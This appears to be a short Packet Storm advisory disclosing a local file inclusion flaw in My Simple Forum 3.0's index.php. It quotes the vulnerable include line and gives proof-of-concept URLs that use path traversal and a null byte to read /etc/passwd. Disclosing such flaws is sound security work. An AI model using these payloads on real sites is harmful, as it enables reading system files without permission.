My Simple Forum version 3.0 suffers from a local file inclusion vulnerability in index.php.
087f22aefba1d484e3cc7328edbd920504a7c81aa672439c5e20d34d43cb62a9/*
$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $
My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
Bug discovered by cOndemned
Script download: http://drennansoft.com/index.php?action=download&id=1
Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura
*/
Source of index.php:
49. if(file_exists('site/'.$_GET['action'].'.php')) {
50. include('site/'.$_GET['action'].'.php');
51. } else {
local file inclusion on line 50
Proof of concept:
http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed